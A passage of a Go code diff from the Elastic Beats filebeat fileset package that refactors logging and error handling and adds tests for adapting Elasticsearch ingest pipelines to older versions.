"{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES < 7.10.0: existing if", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + "if": "ctx?.host?.hostname != null", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "if": "ctx?.host?.hostname != null && ((ctx?.related?.hosts instanceof List && !ctx?.related?.hosts.contains(ctx?.host?.hostname)) || ctx?.related?.hosts != ctx?.host?.hostname)", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "ES < 7.10.0: existing if with contains", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "allow_duplicates": false, + "if": "!ctx?.related?.hosts.contains(ctx?.host?.hostname)", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "value": "{{host.hostname}}", + "if": "!ctx?.related?.hosts.contains(ctx?.host?.hostname)", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "ES < 7.10.0: no value", + esVersion: common.MustNewVersion("7.7.7"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + "allow_duplicates": false, + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "append": map[string]interface{}{ + "field": "related.hosts", + }, + }, + }}, + isErrExpected: false, + }, + } + + for _, test := range cases { + test := test + t.Run(test.name, func(t *testing.T) { + t.Parallel() + err := adaptPipelineForCompatibility(*test.esVersion, "foo-pipeline", test.content, logp.NewLogger(logName)) + if test.isErrExpected { + assert.Error(t, err) + } else { + require.NoError(t, err) + assert.Equal(t, test.expected, test.content, test.name) + } + }) + } +} + +func TestRemoveURIPartsProcessor(t *testing.T) { + cases := []struct { + name string + esVersion *common.Version + content map[string]interface{} + expected map[string]interface{} + isErrExpected bool + }{ + { + name: "ES < 7.12.0", + esVersion: common.MustNewVersion("7.11.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }, + }, + isErrExpected: false, + }, + { + name: "ES == 7.12.0", + esVersion: common.MustNewVersion("7.12.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + isErrExpected: false, + }, + { + name: "ES > 7.12.0", + esVersion: common.MustNewVersion("8.0.0"), + content: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + expected: map[string]interface{}{ + "processors": []interface{}{ + map[string]interface{}{ + "uri_parts": map[string]interface{}{ + "field": "test.url", + "target_field": "url", + }, + }, + map[string]interface{}{ + "set": map[string]interface{}{ + "field": "test.field", + "value": "testvalue", + }, + }, + }}, + isErrExpected: false, + }, + } + + for _, test := range cases { + test := test + t.Run(test.name, func(t *testing.T) { + t.Parallel() + err := adaptPipelineForCompatibility(*test.esVersion, "foo-pipeline", test.content, logp.NewLogger(logName)) + if test.isErrExpected { + assert.Error(t, err) + } else { + require.NoError(t, err) + assert.Equal(t, test.expected, test.content, test.name) + } + }) + } +} diff --git a/filebeat/fileset/config_test.go b/filebeat/fileset/config_test.go index 972d7eff6319..ecefac2e181c 100644 --- a/filebeat/fileset/config_test.go +++ b/filebeat/fileset/config_test.go @@ -21,6 +21,7 @@ import ( "testing" "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/common" ) @@ -34,7 +35,7 @@ func TestInputSettings(t *testing.T) { } c, err := common.NewConfigFrom(cfg) - assert.NoError(t, err) + require.NoError(t, err) f, err := NewFilesetConfig(c) if assert.NoError(t, err) { diff --git a/filebeat/fileset/factory.go b/filebeat/fileset/factory.go index b0656205321e..43aa8e1636ed 100644 --- a/filebeat/fileset/factory.go +++ b/filebeat/fileset/factory.go @@ -57,6 +57,7 @@ type inputsRunner struct { pipelineLoaderFactory PipelineLoaderFactory pipelineCallbackID uuid.UUID overwritePipelines bool + log *logp.Logger } // NewFactory instantiates a new Factory @@ -84,7 +85,9 @@ func (f *Factory) Create(p beat.PipelineConnector, c *common.Config) (cfgfile.Ru // Hash module ID var h map[string]interface{} - c.Unpack(&h) + if err = c.Unpack(&h); err != nil { + return nil, fmt.Errorf("failed to unpack config: %w", err) + } id, err := hashstructure.Hash(h, nil) if err != nil { return nil, err @@ -94,8 +97,7 @@ func (f *Factory) Create(p beat.PipelineConnector, c *common.Config) (cfgfile.Ru for i, pConfig := range pConfigs { inputs[i], err = f.inputFactory.Create(p, pConfig) if err != nil { - logp.Err("Error creating input: %s", err) - return nil, err + return nil, fmt.Errorf("failed to create input: %w", err) } } @@ -106,6 +108,7 @@ func (f *Factory) Create(p beat.PipelineConnector, c *common.Config) (cfgfile.Ru pipelineLoaderFactory: f.pipelineLoaderFactory, pipelineCallbackID: f.pipelineCallbackID, overwritePipelines: f.overwritePipelines, + log: logp.NewLogger(logName), }, nil } @@ -118,8 +121,7 @@ func (f *Factory) CheckConfig(c *common.Config) error { for _, pConfig := range pConfigs { err = f.inputFactory.CheckConfig(pConfig) if err != nil { - logp.Err("Error checking input configuration: %s", err) - return err + return fmt.Errorf("error checking input configuration: %w", err) } } @@ -153,12 +155,12 @@ func (p *inputsRunner) Start() { // makes it possible to try to load pipeline when ES becomes reachable. pipelineLoader, err := p.pipelineLoaderFactory() if err != nil { - logp.Err("Error loading pipeline: %s", err) + p.log.Errorf("Error loading pipeline: %s", err) } else { err := p.moduleRegistry.LoadPipelines(pipelineLoader, p.overwritePipelines) if err != nil { // Log error and continue - logp.Err("Error loading pipeline: %s", err) + p.log.Errorf("Error loading pipeline: %s", err) } } @@ -168,7 +170,7 @@ func (p *inputsRunner) Start() { } p.pipelineCallbackID, err = elasticsearch.RegisterConnectCallback(callback) if err != nil { - logp.Err("Error registering connect callback for Elasticsearch to load pipelines: %v", err) + p.log.Errorf("Error registering connect callback for Elasticsearch to load pipelines: %v", err) } } diff --git a/filebeat/fileset/fileset_test.go b/filebeat/fileset/fileset_test.go index 4a8087af2b48..430d71e0db7a 100644 --- a/filebeat/fileset/fileset_test.go +++ b/filebeat/fileset/fileset_test.go @@ -26,9 +26,8 @@ import ( "testing" "text/template" - "github.com/stretchr/testify/require" - "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" @@ -43,9 +42,9 @@ func makeTestInfo(version string) beat.Info { func getModuleForTesting(t *testing.T, module, fileset string) *Fileset { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) fs, err := New(modulesPath, fileset, &ModuleConfig{Module: module}, &FilesetConfig{}) - assert.NoError(t, err) + require.NoError(t, err) return fs } @@ -54,7 +53,7 @@ func TestLoadManifestNginx(t *testing.T) { fs := getModuleForTesting(t, "nginx", "access") manifest, err := fs.readManifest() - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, manifest.ModuleVersion, "1.0") assert.Equal(t, manifest.IngestPipeline, []string{"ingest/pipeline.yml"}) assert.Equal(t, manifest.Input, "config/nginx-access.yml") @@ -69,7 +68,7 @@ func TestGetBuiltinVars(t *testing.T) { fs := getModuleForTesting(t, "nginx", "access") vars, err := fs.getBuiltinVars(makeTestInfo("6.6.0")) - assert.NoError(t, err) + require.NoError(t, err) assert.IsType(t, vars["hostname"], "a-mac-with-esc-key") assert.IsType(t, vars["domain"], "local") @@ -83,10 +82,10 @@ func TestEvaluateVarsNginx(t *testing.T) { var err error fs.manifest, err = fs.readManifest() - assert.NoError(t, err) + require.NoError(t, err) vars, err := fs.evaluateVars(makeTestInfo("6.6.0")) - assert.NoError(t, err) + require.NoError(t, err) builtin := vars["builtin"].(map[string]interface{}) assert.IsType(t, "a-mac-with-esc-key", builtin["hostname"]) @@ -97,19 +96,19 @@ func TestEvaluateVarsNginx(t *testing.T) { func TestEvaluateVarsNginxOverride(t *testing.T) { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) fs, err := New(modulesPath, "access", &ModuleConfig{Module: "nginx"}, &FilesetConfig{ Var: map[string]interface{}{ "pipeline": "no_plugins", }, }) - assert.NoError(t, err) + require.NoError(t, err) fs.manifest, err = fs.readManifest() - assert.NoError(t, err) + require.NoError(t, err) vars, err := fs.evaluateVars(makeTestInfo("6.6.0")) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "no_plugins", vars["pipeline"]) } @@ -119,10 +118,10 @@ func TestEvaluateVarsMySQL(t *testing.T) { var err error fs.manifest, err = fs.readManifest() - assert.NoError(t, err) + require.NoError(t, err) vars, err := fs.evaluateVars(makeTestInfo("6.6.0")) - assert.NoError(t, err) + require.NoError(t, err) builtin := vars["builtin"].(map[string]interface{}) assert.IsType(t, "a-mac-with-esc-key", builtin["hostname"]) @@ -172,29 +171,29 @@ func TestResolveVariable(t *testing.T) { for _, test := range tests { result, err := resolveVariable(test.Vars, test.Value) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, test.Expected, result) } } func TestGetInputConfigNginx(t *testing.T) { fs := getModuleForTesting(t, "nginx", "access") - assert.NoError(t, fs.Read(makeTestInfo("5.2.0"))) + require.NoError(t, fs.Read(makeTestInfo("5.2.0"))) cfg, err := fs.getInputConfig() - assert.NoError(t, err) + require.NoError(t, err) assert.True(t, cfg.HasField("paths")) assert.True(t, cfg.HasField("exclude_files")) assert.True(t, cfg.HasField("pipeline")) pipelineID, err := cfg.String("pipeline", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "filebeat-5.2.0-nginx-access-pipeline", pipelineID) } func TestGetInputConfigNginxOverrides(t *testing.T) { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) tests := map[string]struct { input map[string]interface{} @@ -216,7 +215,7 @@ func TestGetInputConfigNginxOverrides(t *testing.T) { require.True(t, v) pipelineID, err := c.String("pipeline", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "filebeat-5.2.0-nginx-access-pipeline", pipelineID) }, }, @@ -242,12 +241,12 @@ func TestGetInputConfigNginxOverrides(t *testing.T) { fs, err := New(modulesPath, "access", &ModuleConfig{Module: "nginx"}, &FilesetConfig{ Input: test.input, }) - assert.NoError(t, err) + require.NoError(t, err) - assert.NoError(t, fs.Read(makeTestInfo("5.2.0"))) + require.NoError(t, fs.Read(makeTestInfo("5.2.0"))) cfg, err := fs.getInputConfig() - assert.NoError(t, err) + require.NoError(t, err) assert.True(t, cfg.HasField("paths")) assert.True(t, cfg.HasField("exclude_files")) @@ -256,11 +255,11 @@ func TestGetInputConfigNginxOverrides(t *testing.T) { test.expectedFn(t, cfg) moduleName, err := cfg.String("_module_name", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "nginx", moduleName) filesetName, err := cfg.String("_fileset_name", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, "access", filesetName) }) } @@ -268,11 +267,11 @@ func TestGetInputConfigNginxOverrides(t *testing.T) { func TestGetPipelineNginx(t *testing.T) { fs := getModuleForTesting(t, "nginx", "access") - assert.NoError(t, fs.Read(makeTestInfo("5.2.0"))) + require.NoError(t, fs.Read(makeTestInfo("5.2.0"))) version := common.MustNewVersion("5.2.0") pipelines, err := fs.GetPipelines(*version) - assert.NoError(t, err) + require.NoError(t, err) assert.Len(t, pipelines, 1) pipeline := pipelines[0] @@ -286,7 +285,7 @@ func TestGetTemplateFunctions(t *testing.T) { "builtin": map[string]interface{}{}, } templateFunctions, err := getTemplateFunctions(vars) - assert.NoError(t, err) + require.NoError(t, err) assert.IsType(t, template.FuncMap{}, templateFunctions) assert.Contains(t, templateFunctions, "inList") assert.Contains(t, templateFunctions, "tojson") diff --git a/filebeat/fileset/modules.go b/filebeat/fileset/modules.go index aa0260031cea..3df41999f8fb 100644 --- a/filebeat/fileset/modules.go +++ b/filebeat/fileset/modules.go @@ -26,7 +26,7 @@ import ( "strings" "github.com/pkg/errors" - yaml "gopkg.in/yaml.v2" + "gopkg.in/yaml.v2" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" @@ -34,13 +34,11 @@ import ( "github.com/elastic/beats/v7/libbeat/paths" ) -var availableMLModules = map[string]string{ - "apache": "access", - "nginx": "access", -} +const logName = "modules" type ModuleRegistry struct { registry map[string]map[string]*Fileset // module -> fileset -> Fileset + log *logp.Logger } // newModuleRegistry reads and loads the configured module into the registry. @@ -49,25 +47,26 @@ func newModuleRegistry(modulesPath string, overrides *ModuleOverrides, beatInfo beat.Info, ) (*ModuleRegistry, error) { - - var reg ModuleRegistry - reg.registry = map[string]map[string]*Fileset{} + reg := ModuleRegistry{ + registry: map[string]map[string]*Fileset{}, + log: logp.NewLogger(logName), + } for _, mcfg := range moduleConfigs { - if mcfg.Enabled != nil && (*mcfg.Enabled) == false { + if mcfg.Enabled != nil && !(*mcfg.Enabled) { continue } // Look for moved modules if module, moved := getCurrentModuleName(modulesPath, mcfg.Module); moved { - logp.Warn("Using old name '%s' for module '%s', please update your configuration", mcfg.Module, module) + reg.log.Warnf("Configuration uses the old name %q for module %q, please update your configuration.", mcfg.Module, module) mcfg.Module = module } reg.registry[mcfg.Module] = map[string]*Fileset{} moduleFilesets, err := getModuleFilesets(modulesPath, mcfg.Module) if err != nil { - return nil, fmt.Errorf("Error getting filesets for module %s: %v", mcfg.Module, err) + return nil, fmt.Errorf("error getting filesets for module %s: %v", mcfg.Module, err) } for _, filesetName := range moduleFilesets { @@ -78,10 +77,10 @@ func newModuleRegistry(modulesPath string, fcfg, err = applyOverrides(fcfg, mcfg.Module, filesetName, overrides) if err != nil { - return nil, fmt.Errorf("Error applying overrides on fileset %s/%s: %v", mcfg.Module, filesetName, err) + return nil, fmt.Errorf("error applying overrides on fileset %s/%s: %v", mcfg.Module, filesetName, err) } - if fcfg.Enabled != nil && (*fcfg.Enabled) == false { + if fcfg.Enabled != nil && !(*fcfg.Enabled) { continue } @@ -89,16 +88,15 @@ func newModuleRegistry(modulesPath string, if err != nil { return nil, err } - err = fileset.Read(beatInfo) - if err != nil { - return nil, fmt.Errorf("Error reading fileset %s/%s: %v", mcfg.Module, filesetName, err) + if err = fileset.Read(beatInfo); err != nil { + return nil, fmt.Errorf("error reading fileset %s/%s: %v", mcfg.Module, filesetName, err) } reg.registry[mcfg.Module][filesetName] = fileset } // check that no extra filesets are configured for filesetName, fcfg := range mcfg.Filesets { - if fcfg.Enabled != nil && (*fcfg.Enabled) == false { + if fcfg.Enabled != nil && !(*fcfg.Enabled) { continue } found := false @@ -122,8 +120,9 @@ func NewModuleRegistry(moduleConfigs []*common.Config, beatInfo beat.Info, init stat, err := os.Stat(modulesPath) if err != nil || !stat.IsDir() { - logp.Err("Not loading modules. Module directory not found: %s", modulesPath) - return &ModuleRegistry{}, nil // empty registry, no error + log := logp.NewLogger(logName) + log.Errorf("Not loading modules. Module directory not found: %s", modulesPath) + return &ModuleRegistry{log: log}, nil // empty registry, no error } var modulesCLIList []string @@ -217,7 +216,7 @@ func getModuleFilesets(modulePath, module string) ([]string, error) { return []string{}, err } - filesets := []string{} + var filesets []string for _, fi := range fileInfos { if fi.IsDir() { // check also that the `manifest.yml` file exists @@ -246,7 +245,7 @@ func applyOverrides(fcfg *FilesetConfig, config, err := common.NewConfigFrom(fcfg) if err != nil { - return nil, fmt.Errorf("Error creating vars config object: %v", err) + return nil, fmt.Errorf("error creating vars config object: %v", err) } toMerge := []*common.Config{config} @@ -254,12 +253,12 @@ func applyOverrides(fcfg *FilesetConfig, resultConfig, err := common.MergeConfigs(toMerge...) if err != nil { - return nil, fmt.Errorf("Error merging configs: %v", err) + return nil, fmt.Errorf("error merging configs: %v", err) } res, err := NewFilesetConfig(resultConfig) if err != nil { - return nil, fmt.Errorf("Error unpacking configs: %v", err) + return nil, fmt.Errorf("error unpacking configs: %v", err) } return res, nil @@ -275,7 +274,7 @@ func appendWithoutDuplicates(moduleConfigs []*ModuleConfig, modules []string) ([ // built a dictionary with the configured modules modulesMap := map[string]bool{} for _, mcfg := range moduleConfigs { - if mcfg.Enabled != nil && (*mcfg.Enabled) == false { + if mcfg.Enabled != nil && !(*mcfg.Enabled) { continue } modulesMap[mcfg.Module] = true @@ -291,12 +290,12 @@ func appendWithoutDuplicates(moduleConfigs []*ModuleConfig, modules []string) ([ } func (reg *ModuleRegistry) GetInputConfigs() ([]*common.Config, error) { - result := []*common.Config{} + var result []*common.Config for module, filesets := range reg.registry { for name, fileset := range filesets { fcfg, err := fileset.getInputConfig() if err != nil { - return result, fmt.Errorf("Error getting config for fileset %s/%s: %v", + return result, fmt.Errorf("error getting config for fileset %s/%s: %v", module, name, err) } result = append(result, fcfg) @@ -340,17 +339,17 @@ func checkAvailableProcessors(esClient PipelineLoader, requiredProcessors []Proc } status, body, err := esClient.Request("GET", "/_nodes/ingest", "", nil, nil) if err != nil { - return fmt.Errorf("Error querying _nodes/ingest: %v", err) + return fmt.Errorf("error querying _nodes/ingest: %v", err) } if status > 299 { - return fmt.Errorf("Error querying _nodes/ingest. Status: %d. Response body: %s", status, body) + return fmt.Errorf("error querying _nodes/ingest. Status: %d. Response body: %s", status, body) } err = json.Unmarshal(body, &response) if err != nil { - return fmt.Errorf("Error unmarshaling json when querying _nodes/ingest. Body: %s", body) + return fmt.Errorf("error unmarshaling json when querying _nodes/ingest. Body: %s", body) } - missing := []ProcessorRequirement{} + var missing []ProcessorRequirement for _, requiredProcessor := range requiredProcessors { for _, node := range response.Nodes { available := false @@ -368,11 +367,11 @@ func checkAvailableProcessors(esClient PipelineLoader, requiredProcessors []Proc } if len(missing) > 0 { - missingPlugins := []string{} + var missingPlugins []string for _, proc := range missing { missingPlugins = append(missingPlugins, proc.Plugin) } - errorMsg := fmt.Sprintf("This module requires the following Elasticsearch plugins: %s. "+ + errorMsg := fmt.Sprintf("this module requires the following Elasticsearch plugins: %s. "+ "You can install them by running the following commands on all the Elasticsearch nodes:", strings.Join(missingPlugins, ", ")) for _, plugin := range missingPlugins { diff --git a/filebeat/fileset/modules_integration_test.go b/filebeat/fileset/modules_integration_test.go index 00ced07f6b8a..b4b5c40bb754 100644 --- a/filebeat/fileset/modules_integration_test.go +++ b/filebeat/fileset/modules_integration_test.go @@ -25,10 +25,12 @@ import ( "testing" "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/esleg/eslegclient" "github.com/elastic/beats/v7/libbeat/esleg/eslegtest" + "github.com/elastic/beats/v7/libbeat/logp" ) func makeTestInfo(version string) beat.Info { @@ -48,8 +50,8 @@ func TestLoadPipeline(t *testing.T) { content := map[string]interface{}{ "description": "describe pipeline", - "processors": []map[string]interface{}{ - { + "processors": []interface{}{ + map[string]interface{}{ "set": map[string]interface{}{ "field": "foo", "value": "bar", @@ -58,28 +60,29 @@ func TestLoadPipeline(t *testing.T) { }, } - err := loadPipeline(client, "my-pipeline-id", content, false) - assert.NoError(t, err) + log := logp.NewLogger(logName) + err := loadPipeline(client, "my-pipeline-id", content, false, log) + require.NoError(t, err) status, _, err := client.Request("GET", "/_ingest/pipeline/my-pipeline-id", "", nil, nil) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, 200, status) // loading again shouldn't actually update the pipeline content["description"] = "describe pipeline 2" - err = loadPipeline(client, "my-pipeline-id", content, false) - assert.NoError(t, err) + err = loadPipeline(client, "my-pipeline-id", content, false, log) + require.NoError(t, err) checkUploadedPipeline(t, client, "describe pipeline") // loading again updates the pipeline - err = loadPipeline(client, "my-pipeline-id", content, true) - assert.NoError(t, err) + err = loadPipeline(client, "my-pipeline-id", content, true, log) + require.NoError(t, err) checkUploadedPipeline(t, client, "describe pipeline 2") } func checkUploadedPipeline(t *testing.T, client *eslegclient.Connection, expectedDescription string) { status, response, err := client.Request("GET", "/_ingest/pipeline/my-pipeline-id", "", nil, nil) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, 200, status) var res map[string]interface{} @@ -99,10 +102,10 @@ func TestSetupNginx(t *testing.T) { client.Request("DELETE", "/_ingest/pipeline/filebeat-5.2.0-nginx-error-pipeline", "", nil, nil) modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) configs := []*ModuleConfig{ - &ModuleConfig{Module: "nginx"}, + {Module: "nginx"}, } reg, err := newModuleRegistry(modulesPath, configs, nil, makeTestInfo("5.2.0")) @@ -133,7 +136,7 @@ func TestAvailableProcessors(t *testing.T) { } err := checkAvailableProcessors(client, requiredProcessors) - assert.NoError(t, err) + require.NoError(t, err) // these don't exists on our integration test setup requiredProcessors = []ProcessorRequirement{ @@ -172,13 +175,13 @@ func TestLoadMultiplePipelines(t *testing.T) { client.Request("DELETE", "/_ingest/pipeline/filebeat-6.6.0-foo-multi-plain_logs", "", nil, nil) modulesPath, err := filepath.Abs("../_meta/test/module") - assert.NoError(t, err) + require.NoError(t, err) enabled := true disabled := false filesetConfigs := map[string]*FilesetConfig{ - "multi": &FilesetConfig{Enabled: &enabled}, - "multibad": &FilesetConfig{Enabled: &disabled}, + "multi": {Enabled: &enabled}, + "multibad": {Enabled: &disabled}, } configs := []*ModuleConfig{ &ModuleConfig{"foo", &enabled, filesetConfigs}, @@ -217,16 +220,16 @@ func TestLoadMultiplePipelinesWithRollback(t *testing.T) { client.Request("DELETE", "/_ingest/pipeline/filebeat-6.6.0-foo-multibad-plain_logs_bad", "", nil, nil) modulesPath, err := filepath.Abs("../_meta/test/module") - assert.NoError(t, err) + require.NoError(t, err) enabled := true disabled := false filesetConfigs := map[string]*FilesetConfig{ - "multi": &FilesetConfig{Enabled: &disabled}, - "multibad": &FilesetConfig{Enabled: &enabled}, + "multi": {Enabled: &disabled}, + "multibad": {Enabled: &enabled}, } configs := []*ModuleConfig{ - &ModuleConfig{"foo", &enabled, filesetConfigs}, + {"foo", &enabled, filesetConfigs}, } reg, err := newModuleRegistry(modulesPath, configs, nil, makeTestInfo("6.6.0")) diff --git a/filebeat/fileset/modules_test.go b/filebeat/fileset/modules_test.go index 371b051084db..f69db27648c5 100644 --- a/filebeat/fileset/modules_test.go +++ b/filebeat/fileset/modules_test.go @@ -26,6 +26,7 @@ import ( "testing" "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" @@ -42,17 +43,17 @@ func load(t *testing.T, from interface{}) *common.Config { func TestNewModuleRegistry(t *testing.T) { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) configs := []*ModuleConfig{ - &ModuleConfig{Module: "nginx"}, - &ModuleConfig{Module: "mysql"}, - &ModuleConfig{Module: "system"}, - &ModuleConfig{Module: "auditd"}, + {Module: "nginx"}, + {Module: "mysql"}, + {Module: "system"}, + {Module: "auditd"}, } reg, err := newModuleRegistry(modulesPath, configs, nil, beat.Info{Version: "5.2.0"}) - assert.NoError(t, err) + require.NoError(t, err) assert.NotNil(t, reg) expectedModules := map[string][]string{ @@ -77,14 +78,14 @@ func TestNewModuleRegistry(t *testing.T) { for module, filesets := range reg.registry { for name, fileset := range filesets { cfg, err := fileset.getInputConfig() - assert.NoError(t, err, fmt.Sprintf("module: %s, fileset: %s", module, name)) + require.NoError(t, err, fmt.Sprintf("module: %s, fileset: %s", module, name)) moduleName, err := cfg.String("_module_name", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, module, moduleName) filesetName, err := cfg.String("_fileset_name", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, name, filesetName) } } @@ -92,12 +93,12 @@ func TestNewModuleRegistry(t *testing.T) { func TestNewModuleRegistryConfig(t *testing.T) { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) falseVar := false configs := []*ModuleConfig{ - &ModuleConfig{ + { Module: "nginx", Filesets: map[string]*FilesetConfig{ "access": { @@ -110,29 +111,30 @@ func TestNewModuleRegistryConfig(t *testing.T) { }, }, }, - &ModuleConfig{ + { Module: "mysql", Enabled: &falseVar, }, } reg, err := newModuleRegistry(modulesPath, configs, nil, beat.Info{Version: "5.2.0"}) - assert.NoError(t, err) + require.NoError(t, err) assert.NotNil(t, reg) nginxAccess := reg.registry["nginx"]["access"] - assert.NotNil(t, nginxAccess) - assert.Equal(t, []interface{}{"/hello/test"}, nginxAccess.vars["paths"]) + if assert.NotNil(t, nginxAccess) { + assert.Equal(t, []interface{}{"/hello/test"}, nginxAccess.vars["paths"]) + } assert.NotContains(t, reg.registry["nginx"], "error") } func TestMovedModule(t *testing.T) { modulesPath, err := filepath.Abs("./test/moved_module") - assert.NoError(t, err) + require.NoError(t, err) configs := []*ModuleConfig{ - &ModuleConfig{ + { Module: "old", Filesets: map[string]*FilesetConfig{ "test": {}, @@ -141,7 +143,7 @@ func TestMovedModule(t *testing.T) { } reg, err := newModuleRegistry(modulesPath, configs, nil, beat.Info{Version: "5.2.0"}) - assert.NoError(t, err) + require.NoError(t, err) assert.NotNil(t, reg) } @@ -232,7 +234,7 @@ func TestApplyOverrides(t *testing.T) { for _, test := range tests { t.Run(test.name, func(t *testing.T) { result, err := applyOverrides(&test.fcfg, test.module, test.fileset, test.overrides) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, &test.expected, result) }) } @@ -251,15 +253,15 @@ func TestAppendWithoutDuplicates(t *testing.T) { configs: []*ModuleConfig{}, modules: []string{"moduleA", "moduleB", "moduleC"}, expected: []*ModuleConfig{ - &ModuleConfig{Module: "moduleA"}, - &ModuleConfig{Module: "moduleB"}, - &ModuleConfig{Module: "moduleC"}, + {Module: "moduleA"}, + {Module: "moduleB"}, + {Module: "moduleC"}, }, }, { name: "eliminate a duplicate, no override", configs: []*ModuleConfig{ - &ModuleConfig{ + { Module: "moduleB", Filesets: map[string]*FilesetConfig{ "fileset": { @@ -272,7 +274,7 @@ func TestAppendWithoutDuplicates(t *testing.T) { }, modules: []string{"moduleA", "moduleB", "moduleC"}, expected: []*ModuleConfig{ - &ModuleConfig{ + { Module: "moduleB", Filesets: map[string]*FilesetConfig{ "fileset": { @@ -282,14 +284,14 @@ func TestAppendWithoutDuplicates(t *testing.T) { }, }, }, - &ModuleConfig{Module: "moduleA"}, - &ModuleConfig{Module: "moduleC"}, + {Module: "moduleA"}, + {Module: "moduleC"}, }, }, { name: "disabled config", configs: []*ModuleConfig{ - &ModuleConfig{ + { Module: "moduleB", Enabled: &falseVar, Filesets: map[string]*FilesetConfig{ @@ -303,7 +305,7 @@ func TestAppendWithoutDuplicates(t *testing.T) { }, modules: []string{"moduleA", "moduleB", "moduleC"}, expected: []*ModuleConfig{ - &ModuleConfig{ + { Module: "moduleB", Enabled: &falseVar, Filesets: map[string]*FilesetConfig{ @@ -314,9 +316,9 @@ func TestAppendWithoutDuplicates(t *testing.T) { }, }, }, - &ModuleConfig{Module: "moduleA"}, - &ModuleConfig{Module: "moduleB"}, - &ModuleConfig{Module: "moduleC"}, + {Module: "moduleA"}, + {Module: "moduleB"}, + {Module: "moduleC"}, }, }, } @@ -324,7 +326,7 @@ func TestAppendWithoutDuplicates(t *testing.T) { for _, test := range tests { t.Run(test.name, func(t *testing.T) { result, err := appendWithoutDuplicates(test.configs, test.modules) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, test.expected, result) }) } @@ -377,7 +379,7 @@ func TestMcfgFromConfig(t *testing.T) { for _, test := range tests { t.Run(test.name, func(t *testing.T) { result, err := mcfgFromConfig(test.config) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, test.expected.Module, result.Module) assert.Equal(t, len(test.expected.Filesets), len(result.Filesets)) for name, fileset := range test.expected.Filesets { @@ -397,12 +399,12 @@ func TestMissingModuleFolder(t *testing.T) { } 